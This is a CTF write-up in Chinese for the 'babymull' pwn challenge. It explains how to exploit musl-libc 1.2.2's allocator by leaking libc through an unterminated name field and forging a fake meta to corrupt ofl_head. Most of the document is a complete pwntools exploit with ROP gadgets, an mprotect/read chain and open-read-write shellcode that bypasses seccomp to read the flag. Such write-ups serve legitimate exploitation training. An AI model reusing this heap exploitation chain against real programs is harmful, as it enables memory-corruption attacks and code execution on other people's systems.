

1.2.2的musl-libc利用, 题目给了一个gift函数可以实现一个已知地址一字节置零和泄露已知地址的64位数据   实际上漏洞也就是这个了

题目开了seccomp

![wp.png](/imgs/wp.png)

所以采用orw方式读取flag

---

# 题目条件

## 预定义的一些结构

```c
struct buffdes
{
  char name[16];
  void *pBuf;
  _QWORD size;
};
buffdes * bufflist[16];
```

提供了5个操作

add

![add1.png](/imgs/add1.png)

![add2.png](/imgs/add2.png)

dele

![dele.png](/imgs/dele.png)

show 只能使用一次

![show.png](/imgs/show.png)

gift 同样只能用一次

![gift.png](/imgs/gift.png)

以及一个exit

# 思路

## 泄露libc

首先注意到`buffdes`的结构里, `name`与`pbuff`紧紧相邻, 并且仔细观察`add`函数中的复制操作, **并未对`name`数组添加尾缀零** 所以只要能够让`name[15]`非零, 且`pbuff`是`mmap`得到的空间, 就可以计算出`libc`的基址

## 攻击面

`musl-libc`对`meta`的`unlink`操作没有检查,可以伪造`fake_meta`的`prev`和`next`域来实现一个任意地址写

伪造`meta`需要的条件可以通过分析源码得到

在`musl-libc`中有一个与`IO_list_all`相似的变量`ofl_head`, 在`exit`函数中调用的`__stdin_exit`函数中使用:

![exit.png](/imgs/exit.png)

![__stdio_exit.png](/imgs/__stdio_exit.png)

`close_file`中：

![close_file.png](/imgs/close_file.png)

所以将ofl_head修改为可控的地址之后，再将`f→write`改为这样一个`gadget`

```c
0x000000000004bcf3: mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
```

就可以直接迁栈到可控内存中

完整exp

```c
from pwn import *
context.arch = 'amd64'
sh = process("./babymull")

size_class = [
	1, 2, 3, 4, 5, 6, 7, 8,
	9, 10, 12, 15,
	18, 20, 25, 31,
	36, 42, 50, 63,
	72, 84, 102, 127,
	146, 170, 204, 255,
	292, 340, 409, 511,
	584, 682, 818, 1023,
	1169, 1364, 1637, 2047,
	2340, 2730, 3276, 4095,
	4680, 5460, 6552, 8191
]
def find_offset_fit_class(offset):
    for i in range(len(size_class)):
        if size_class[i] <= offset and size_class[i+1] > offset:
            return i
    return -1
def CountTailingZero(n):
    debruijn32 = [
		0, 1, 23, 2, 29, 24, 19, 3, 30, 27, 25, 11, 20, 8, 4, 13,
		31, 22, 28, 18, 26, 10, 7, 12, 21, 17, 9, 6, 16, 5, 15, 14
    ]
    return debruijn32[((n&-n)*0x076be629&0xffffffff) >> 27]
def CountLeadingZero(n):
    n >>= 1
    n |= n >> 1
    n |= n >> 2
    n |= n >> 4
    n |= n >> 8
    n |= n >> 16
    n += 1
    return 31-CountTailingZero(n)
def size_to_class(n):
    n = (n+3)>>4
    if n < 10:
        return n 
    n += 1
    i = (28-CountLeadingZero(n))*4+8
    if(n > size_class[i+1]): i+= 2
    if(n > size_class[i] ): i+=1
    return i
class fakeMeta:
    prev = 0
    next = 0
    mem = 0
    avail_mask=0
    freed_mask=0
    last_idx = 0
    freeable = 1
    sizeclass = 0
    maplen = 0
    def Mask(self):
        return (self.avail_mask) | (self.freed_mask << 32)
    def payload(self):
        Payload = p64(self.prev)
        Payload += p64(self.next)
        Payload += p64(self.mem)
        Payload += p64(self.Mask())
        flag = self.last_idx & 0x1f
        flag |= (self.freeable & 1) << 5
        flag |= (self.sizeclass & 0x3f) << 6
        flag |= self.maplen << 12
        Payload += p64(flag)
        return Payload

def add(name,size,content):
    sh.sendlineafter(b">> ",b'1')
    sh.sendafter(b"Name: ",name)
    sh.sendlineafter(b"Size: ",str(size))
    sh.sendafter(b"Content: ",content)
    return
def dele(idx):
    sh.sendlineafter(b">> ",b'2')
    sh.sendlineafter(b"Index: ",str(idx))
    return
def show(idx):
    sh.sendlineafter(b">> ",b'3')
    sh.sendlineafter(b"Index: ",str(idx))
    return 
def gift(write_addr,leak_addr):
    sh.sendlineafter(b">> ",b'1932620593')
    sh.sendline(str(write_addr))
    sh.sendline(str(leak_addr))
    return
for i in range(5):
    add(b'a'*0xf,0x2c,b'a'*0x2c)
dele(4)
add(b'fuckyou',420,b'aiofoahfio\n')

add(b'a'*0xf,0x1000,':)\n') 
show(5)
libc_base = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x20 + 0x4000
success('libc_base : '+hex(libc_base))
libc = ELF('./libc.so')
malloc_ctx = libc_base + libc.sym['__malloc_context'] 
success('malloc_context : '+hex(malloc_ctx))
for i in range(6):
    dele(i)
context.log_level = 'debug'
gadget = 0x4bcf3
pop_rdi = 0x15536+libc_base
pop_rsi = libc_base +0x1b3a9
pop_rdx = libc_base + 0x177c7
read_addr = libc_base + libc.sym['read']
mprotect_addr = libc_base + libc.sym['mprotect']
Payload = p64(0)*6
Payload += p64(libc_base-0x2000+0x100) 
Payload += p64(pop_rdi)
Payload += p64(0)
Payload += p64(libc_base + gadget)
Payload += p64(0) * 20
Payload += p64(libc_base)
Payload += p64(pop_rsi)
Payload += p64(0x1000)
Payload += p64(pop_rdx)
Payload += p64(7)
Payload += p64(mprotect_addr)
Payload += p64(pop_rdi)
Payload += p64(0)
Payload += p64(pop_rsi)
Payload += p64(libc_base)
Payload += p64(pop_rdx)
Payload += p64(0x200)
Payload += p64(read_addr)
Payload += p64(libc_base) + b'\n'
add(b'fuckyou',0xa9c,Payload)  #0 
add(b'fuckyou',0x1000,b'a'*0x520+p64(libc_base-0x1000+0x40)+p64(0)+p64(libc_base-0x1000+0x10)+b'\x02'+b'\x00'*7+b'cat ./flag\x00'+b'\n') # 1
add(b'fuckyou',0x1000,b'a'*0xfd7+b'\x00'+p32(5)+b'\n') #2
gift(libc_base-0x4a82,malloc_ctx)
sh.recvuntil(b'0x')
check = int(sh.recvline()[:-1],16)
success("check : "+hex(check))
meta = fakeMeta()
meta.prev = libc_base-0x2000+0x10
meta.next = libc_base + libc.sym['ofl_head']
meta.mem = libc_base-0x5a90
meta.last_idx = 2
meta.sizeclass = find_offset_fit_class(0x100)
meta.maplen = 0
meta.avail_mask = 0
meta.freed_mask = 5

meta1 = fakeMeta()
meta1.freeable = 0
meta1.mem = libc_base - 0x5aa0
meta1.prev = 0
meta1.next = 0
meta1.last_idx = 0
meta1.avail_mask = 0
meta1.freed_mask = 0
meta1.maplen = 0
meta1.sizeclass = 2
add(b'fuckyou',0xa9c,b'a'*0x550+p64(check)+b'x'*8+meta.payload()+b'x'*8+meta1.payload()+b'\n') # 3
dele(2)
#gdb.attach(sh)
sh.sendlineafter('>> ',b'4')
shellcode1 = asm('''
    push 0x67616c66
    mov rdi,rsp
    xor esi,esi
    push 2
    pop rax
    syscall
    mov rdi,rax
    mov rsi,rsp
    mov edx,0x100
    xor eax,eax
    syscall
    mov edi,1
    mov rsi,rsp
    push 1
    pop rax
    syscall
    ''')
sh.sendline(shellcode1)
sh.interactive()

#  0x000000000004bcf3: mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
```